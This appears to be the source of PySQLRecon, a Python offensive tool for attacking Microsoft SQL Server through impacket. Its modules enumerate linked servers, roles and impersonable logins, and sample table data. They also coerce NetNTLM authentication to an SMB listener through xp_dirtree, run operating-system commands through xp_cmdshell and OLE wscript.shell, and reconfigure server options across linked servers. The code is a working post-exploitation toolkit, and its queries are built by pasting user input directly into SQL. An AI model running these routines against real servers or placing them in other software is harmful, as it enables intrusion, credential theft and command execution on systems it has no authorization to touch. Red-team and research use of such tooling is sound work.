import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "search"
HELP = "[bright_black][NORM][/] Keyword search column names for all tables within a database [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True, no_args_is_help=True)
def main(
    ctx: typer.Context,
    keyword: str = typer.Option(..., '--keyword', help='Keyword to search for')):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:
        logger.info(f"Searching for columns containing '{keyword}' in '{pysqlrecon.db}' on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Searching for columns containing '{keyword}' in '{pysqlrecon.db}' on {pysqlrecon.target}")
    
    if pysqlrecon.link:
        query = "SELECT table_name, column_name " \
            f"FROM {pysqlrecon.db}.INFORMATION_SCHEMA.COLUMNS WHERE column_name LIKE '%{keyword}%';"
    else:
        query = "SELECT table_name, column_name " \
            f"FROM INFORMATION_SCHEMA.COLUMNS WHERE column_name LIKE '%{keyword}%';"

    pysqlrecon.query_handler(query, use_rpc_query=True)
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()



import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "links"
HELP = "[bright_black][NORM][/] Enumerate linked servers [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:
        logger.info(f"Enumerating linked servers on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Enumerating linked servers on {pysqlrecon.target}")
    
    query = "SELECT name, product, provider, data_source FROM sys.servers WHERE is_linked = 1;"
    pysqlrecon.query_handler(query)
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()


import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "sample"
HELP = "[bright_black][NORM][/] Query a sample of table data [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True, no_args_is_help=True)
def main(
    ctx     : typer.Context,
    table   : str = typer.Option(..., '--table', help='Table name'),
    count   : int = typer.Option(5, '--count', help='Number of rows to return')):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:
        logger.info(f"Sampling data from '{table}' in '{pysqlrecon.db}' on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Sampling data from '{table}' in '{pysqlrecon.db}' on {pysqlrecon.target}")
    
    query = f"use {pysqlrecon.db}; SELECT TOP {count} * FROM {table};"
    pysqlrecon.query_handler(query, use_rpc_query=True)
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()


import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "smb"
HELP = "[bright_black][NORM][/] Coerce NetNTLM auth via xp_dirtree [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True, no_args_is_help=True)
def main(
    ctx: typer.Context,
    listener: str = typer.Option(..., '--listener', help='UNC path to SMB listener')):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:
        logger.info(f"Triggering SMB request to {listener} on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Triggering SMB request to {listener} on {pysqlrecon.target}")
    
    query = f"EXEC master..xp_dirtree '{listener}';"
    if pysqlrecon.link is not None:
        query = "SELECT 1; " + query
    
    pysqlrecon.query_handler(query)
    logger.info("SMB request triggered")

    pysqlrecon.disconnect()


import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "agentstatus"
HELP = "[red][PRIV][/] Enumerate SQL agent status and jobs [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()
    
    if pysqlrecon.link is not None:
        logger.info(f"Getting SQL agent status on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Getting SQL agent status on {pysqlrecon.target}")
    
    
    if not pysqlrecon.get_agent_status():
        logger.warning("SQL agent is not running")
        pysqlrecon.disconnect()
        exit()
    
    logger.info("SQL agent is running")
    
    if pysqlrecon.link is not None:
        logger.info(f"Agent jobs on {pysqlrecon.link}")
    else:
        logger.info(f"Agent jobs on {pysqlrecon.target}")

    pysqlrecon.get_agent_jobs()
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()


import typer

from pysqlrecon.logger import logger, console, OBJ_EXTRA_FMT
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "whoami"
HELP = "[bright_black][NORM][/] Gather logged in user, mapped user and roles [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True

DEFAULT_ROLES = ["sysadmin", "setupadmin", "serveradmin", "securityadmin",
                    "processadmin", "diskadmin", "dbcreator", "bulkadmin"]

@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()
    
    if pysqlrecon.link is not None:
        logger.info(f"Determining user permissions on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Determining user permissions on {pysqlrecon.target}")

    pysqlrecon.query_handler("SELECT SYSTEM_USER;")
    logger.info(f"Logged in as [cyan]{pysqlrecon.get_last_resp()}[/]", extra=OBJ_EXTRA_FMT)
    
    pysqlrecon.query_handler("SELECT USER_NAME();")
    logger.info(f"Mapped to the user [cyan]{pysqlrecon.get_last_resp()}[/]", extra=OBJ_EXTRA_FMT)

    logger.info("Gathering roles:")
    pysqlrecon.query_handler("SELECT [name] FROM sysusers WHERE issqlrole = 1;")
    roles = [row['name'] for row in pysqlrecon.ms_sql.rows]
    
    logger.debug(f"Identified {len(roles)} database roles")
    logger.debug(f"Roles: {roles}")
    
    print()

    # db-specific roles    
    for role in roles:
        pysqlrecon.query_handler(f"SELECT IS_MEMBER('{role}');")
        check_role(role, pysqlrecon.get_last_resp())

    # check server roles
    for role in DEFAULT_ROLES:
        pysqlrecon.query_handler(f"SELECT IS_SRVROLEMEMBER('{role}');")
        check_role(role, pysqlrecon.get_last_resp())


    print()
    pysqlrecon.disconnect()


def check_role(role, last_resp):
    if last_resp == 1:
        console.print(f"{' |->':>15} User is a member of the [green]{role}[/] role")
    else:
        console.print(f"{' |->':>15} User is NOT a member of the [red]{role}[/] role")


import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "impersonate"
HELP = "[bright_black][NORM][/] Enumerate users that can be impersonated"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = False


@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()

    if pysqlrecon.link is not None:
        logger.info(f"Enumerating users that can be impersonated on {pysqlrecon.link} via {pysqlrecon.target}")
    else:
        logger.info(f"Enumerating users that can be impersonated on {pysqlrecon.target}")

    query = "SELECT distinct b.name FROM sys.server_permissions a " \
            "INNER JOIN sys.server_principals b ON a.grantor_principal_id " \
            "= b.principal_id WHERE a.permission_name = 'IMPERSONATE';"

    pysqlrecon.query_handler(query)
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()


import random
import string

from pysqlrecon.logger import logger    


class ModuleMixin:
    OLE_OUTPUT_COL = "Column1"
    OLE_DESIRED_VAL = 0
    OLE_LINK_OUTPUT_COL = ""
    OLE_LINK_DESIRED_VAL = 1

    # check status of a module
    def check_module(self, name) -> bool:
        query = "SELECT CAST(name AS NVARCHAR(128)) AS name, " \
                "CAST(value_in_use AS INT) AS value_in_use\n" \
                "FROM sys.configurations\n" \
                f"WHERE name = '{name}';"
        
        self.exec_standard_query(query)

        if self.ms_sql.rows[0]['value_in_use'] == 1:
            return True
        
        return False
        
    
    # toggle a module on/off on a linked server
    def linked_module_toggle(self, name, value) -> None:
        if not self.check_rpc_on_link(self.link):
            logger.warning(f"RPC needs to be enabled on {self.link} first")
            exit()

        if name == "rpc":
            query = f"EXEC sp_serveroption '{self.link}', 'rpc out', '{value}';"
        else:
            query = f"sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure '{name}', {value}; RECONFIGURE;"
        self.exec_lquery_rpc(query)


    # get the status of a module on a linked server
    def linked_check_module(self, name) -> bool:
        query = "SELECT CAST(name AS NVARCHAR(128)) AS name, " \
                "CAST(value_in_use AS INT) AS value_in_use\n" \
                "FROM sys.configurations\n" \
                f"WHERE name = '{name}';"
        
        self.exec_lquery(query)
        
        if self.ms_sql.rows[0]['value_in_use'] == 1:
            return True
        
        return False

    
    # toggle a module on/off on local server
    def module_toggle(self, name, value, link_host=None) -> None:
        if name == "rpc":
            query = f"EXEC sp_serveroption '{link_host}', 'rpc out', '{value}';"
        else:
            # reconfigure
            query = "EXEC sp_configure 'show advanced options', 1; " \
                    "RECONFIGURE; " \
                    f"EXEC sp_configure '{name}', {value}; " \
                    "RECONFIGURE;"
        
        self.query_handler(query)


    # run a command via xp_cmdshell
    def xpcmd(self, cmd) -> None:
        if self.link is not None:
            query = f"select 1; exec master..xp_cmdshell '{cmd}'"
            self.exec_lquery(query)
        else:
            query = f"EXEC xp_cmdshell '{cmd}';"
            self.exec_standard_query(query)


    # run a command via OLE automation procedures
    def ole_cmd(self, cmd) -> None:
        output = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
        program = ''.join(random.choices(string.ascii_letters + string.digits, k=8))

        logger.info(f"Setting sp_oacreate to '{output}'")
        logger.info(f"Setting sp_oamethod to '{program}'")

        query = f"DECLARE @{output} INT; \n" \
                f"DECLARE @{program} VARCHAR(255);\n" \
                f"SET @{program} = 'Run(\"{cmd}\")';\n" \
                f"EXEC sp_oacreate 'wscript.shell', @{output} out;\n" \
                f"EXEC sp_oamethod @{output}, @{program};\n" \
                f"EXEC sp_oadestroy @{output};"
        
        col = ModuleMixin.OLE_OUTPUT_COL
        val = ModuleMixin.OLE_DESIRED_VAL
        
        if self.link:
            self.exec_lquery("select 1; " + query)
            col = ModuleMixin.OLE_LINK_OUTPUT_COL
            val = ModuleMixin.OLE_LINK_DESIRED_VAL
        else:
            self.exec_standard_query(query)

        if self.get_last_resp(col) == val:
            logger.info("Command executed")
            logger.info(f"Destroyed '{output}' and '{program}'")
        else:
            logger.error("Error executing OLE command")



from impacket import tds
from typing import Any
from rich.table import Table

from pysqlrecon.lib.exceptions import DuplicateAssemblyError
from pysqlrecon.logger import logger, console
from pysqlrecon.lib.sqlagent import SqlAgentMixin
from pysqlrecon.lib.clr import ClrMixin
from pysqlrecon.lib.module import ModuleMixin
from pysqlrecon.lib.query import QueryMixin


class PySqlRecon(SqlAgentMixin, ClrMixin, ModuleMixin, QueryMixin):

    # https://learn.microsoft.com/en-us/sql/relational-databases/errors-events/database-engine-events-and-errors-6000-to-6999?view=sql-server-ver16
    DUPLICATE_ASM_ERROR = 6285


    def __init__(self, target, domain, username, password, port, link, impersonate,
                    db, hashes, aesKey, kerberos, no_pass, dc_ip, windows_auth) -> None:

        self.target = target
        self.domain = domain
        self.username = username
        self.password = password
        self.port = port
        self.link = link
        self.impersonate = impersonate
        self.db = db
        self.hashes = hashes
        self.aesKey = aesKey
        self.kerberos = kerberos
        self.dc_ip = dc_ip
        self.windows_auth = windows_auth

        self.ms_sql = None

        if self.password is None and self.username != '' and self.hashes is None and no_pass is False and self.aesKey is None:
            from getpass import getpass
            self.password = getpass("Password:")
            print()

    
    # connect to the SQL server
    def connect(self) -> None:
        logger.info(f"Connecting to {self.target}:{self.port}")
        self.ms_sql = tds.MSSQL(self.target, int(self.port))

        try:
            self.ms_sql.connect()
        except Exception as e:
            logger.error(str(e))
            exit()

        # if a link was specified, treat db name as remote db
        db = None if self.link is not None else self.db

        try:
            with console.status("Authenticating...", spinner="arc"):
                if self.kerberos is True:
                    logger.debug("Using Kerberos authentication")
                    self.ms_sql.kerberosLogin(db, self.username, self.password, self.domain, 
                                            self.hashes, self.aesKey, kdcHost=self.dc_ip)
                else:
                    self.ms_sql.login(db, self.username, self.password, self.domain, self.hashes, self.windows_auth)
        except Exception as e:
            logger.error(str(e))
            exit()

        self.print_replies()
        logger.debug("Login successful")

    
    # used to create a second connect for ADSI credential capture
    def make_dup_connection(self) -> None:
        logger.info(f"Initiating second connection to {self.target}:{self.port}")
        ms_sql = tds.MSSQL(self.target, int(self.port))
        ms_sql.connect()

        # if a link was specified, treat db name as remote db
        db = None if self.link is not None else self.db

        try:
            with console.status("Authenticating...", spinner="arc"):
                if self.kerberos is True:
                    logger.debug("Using Kerberos authentication")
                    ms_sql.kerberosLogin(db, self.username, self.password, self.domain, 
                                            self.hashes, self.aesKey, kdcHost=self.dc_ip)
                else:
                    ms_sql.login(db, self.username, self.password, self.domain, self.hashes, self.windows_auth)
        except Exception as e:
            logger.error(str(e))
            return None

        self.print_replies()
        logger.debug("Login successful")
        return ms_sql


    # disconnect from the SQL server
    def disconnect(self) -> None:
        self.ms_sql.disconnect()
        logger.debug("Disconnected from SQL server")

    
    # return value from single row/col queries
    # (i.e. SELECT @@VERSION)
    def get_last_resp(self, attr="") -> Any:
        return self.ms_sql.rows[0][attr]
    

    # ensure the specified linked server exists
    def validate_link(self, target_link=None, use_link=False) -> bool:
        query = "SELECT name FROM sys.servers WHERE is_linked = 1;"
        
        if use_link:
            self.exec_lquery(query)
        else:
            self.exec_standard_query("SELECT name FROM sys.servers WHERE is_linked = 1;")
        
        target_link = target_link.lower() if target_link is not None else self.link.lower()

        if target_link in [row['name'].lower() for row in self.ms_sql.rows]:
            return True
        
        return False



    # ensure the specified login can be impersonated
    def validate_impersonate(self) -> None:
        self.ms_sql.sql_query(
            "SELECT distinct b.name FROM sys.server_permissions a " \
            "INNER JOIN sys.server_principals b ON a.grantor_principal_id " \
            "= b.principal_id WHERE a.permission_name = 'IMPERSONATE';"
        )

        if self.impersonate.lower() not in [row['name'].lower() for row in self.ms_sql.rows]:
            logger.warning(f"The {self.impersonate} login cannot be impersonated")
            self.disconnect()
            exit()


    @staticmethod
    def validate_opts(link_compat, impersonate_compat, link, impersonate) -> bool:
        if link_compat is False and link is not None:
            logger.error("This command does not support links")
            return False

        if impersonate_compat is False and impersonate is not None:
            logger.error("This command does not support impersonation")
            return False

        return True
    

    def print_results(self, use_basic_tables) -> None:
        if len(self.ms_sql.rows) == 0:
            logger.warning("No results found")
            return
        
        # for xpcmdshell output
        #  replace blank lines that are reutned as 'NULL'
        if 'output' in self.ms_sql.rows[0]:
            for item in self.ms_sql.rows:
                for k, v in item.items():
                    if v == 'NULL':
                        item[k] = ''
        
        if use_basic_tables:
            self.print_basic_table()
        else:
            self.pretty_print_table()

    

    def print_basic_table(self) -> None:
        headers = ' | '.join(self.ms_sql.rows[0].keys())

        print()
        print(headers)
        print('-' * len(headers))

        for row in self.ms_sql.rows:
            print(' | '.join([str(value) for value in row.values()]))   

        print() 


    # format query results in Rich table
    def pretty_print_table(self) -> None:
        table = Table(
            row_styles=["none", "dim"]
        )
        
        # prep col headers
        for col in self.ms_sql.rows[0].keys():
            table.add_column(col, justify="left")

        for row in self.ms_sql.rows:
            table.add_row(*[value.decode('utf-8') if isinstance(value, bytes) else str(value) for value in row.values()])

        print()
        console.print(table)
        print()


    # https://github.com/fortra/impacket/blob/master/impacket/tds.py#L1019C5-L1051C8
    def print_replies(self) -> None:
        for keys in list(self.ms_sql.replies.keys()):
            for i, key in enumerate(self.ms_sql.replies[keys]):
                if key['TokenType'] == tds.TDS_ERROR_TOKEN:
                    error_num = key['Number']
                    error =  "(%s): Line %d: %s" % (key['ServerName'].decode('utf-16le'), key['LineNumber'], key['MsgText'].decode('utf-16le'))                                      
                    self.lastError = tds.SQLErrorException("ERROR: Line %d: %s" % (key['LineNumber'], key['MsgText'].decode('utf-16le')))
                    logger.error(error)

                    # handle duplicate assembly error
                    if error_num == PySqlRecon.DUPLICATE_ASM_ERROR:
                        raise DuplicateAssemblyError(error)
                    
                    exit()

                elif key['TokenType'] == tds.TDS_INFO_TOKEN:
                    logger.debug("(%s): Line %d: %s" % (key['ServerName'].decode('utf-16le'), key['LineNumber'], key['MsgText'].decode('utf-16le')))

                elif key['TokenType'] == tds.TDS_LOGINACK_TOKEN:
                    logger.debug("ACK: Result: %s - %s (%d%d %d%d) " % (key['Interface'], key['ProgName'].decode('utf-16le'), key['MajorVer'], key['MinorVer'], key['BuildNumHi'], key['BuildNumLow']))

                elif key['TokenType'] == tds.TDS_ENVCHANGE_TOKEN:
                    if key['Type'] in (tds.TDS_ENVCHANGE_DATABASE, tds.TDS_ENVCHANGE_LANGUAGE, tds.TDS_ENVCHANGE_CHARSET, tds.TDS_ENVCHANGE_PACKETSIZE):
                        record = tds.TDS_ENVCHANGE_VARCHAR(key['Data'])
                        if record['OldValue'] == '':
                            record['OldValue'] = 'None'.encode('utf-16le')
                        elif record['NewValue'] == '':
                            record['NewValue'] = 'None'.encode('utf-16le')
                        if key['Type'] == tds.TDS_ENVCHANGE_DATABASE:
                            _type = 'DATABASE'
                        elif key['Type'] == tds.TDS_ENVCHANGE_LANGUAGE:
                            _type = 'LANGUAGE'
                        elif key['Type'] == tds.TDS_ENVCHANGE_CHARSET:
                            _type = 'CHARSET'
                        elif key['Type'] == tds.TDS_ENVCHANGE_PACKETSIZE:
                            _type = 'PACKETSIZE'
                        else:
                            _type = "%d" % key['Type']                 
                        logger.debug("ENVCHANGE(%s): Old Value: %s, New Value: %s" % (_type,record['OldValue'].decode('utf-16le'), record['NewValue'].decode('utf-16le')))
       


import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "xpcmd"
HELP = "[red][PRIV][/] Execute a system command using xp_cmdshell [I,L]"
LINK_COMPATIBLE = True
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx: typer.Context,
    command: str = typer.Option(..., '--command', help='Command to execute')):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    pysqlrecon.connect()
    
    logger.info("Executing system command...")

    if pysqlrecon.link is not None:
        if pysqlrecon.linked_check_module("xp_cmdshell"):
            pysqlrecon.xpcmd(command)
            logger.info("Command executed (Output not returned for linked server cmd execution)")
        else:
            logger.warning(f"xp_cmdshell is not enabled on {pysqlrecon.link}")

    else:
        if pysqlrecon.check_module("xp_cmdshell"):
            pysqlrecon.xpcmd(command)
            pysqlrecon.print_results(use_basic_tables)
        else:
            logger.warning("xp_cmdshell is not enabled")

    pysqlrecon.disconnect()


import re


class DuplicateAssemblyError(Exception):
    """
    Exception raised for creation of a CLR assembly that already exsists
    """
    
    def __init__(self, message):
        self.assembly_name = ""

        # extract the name of the assembly from the message       
        match = re.search(r'name "(.*?)"', message)
        if match:
            self.assembly_name = match.group(1)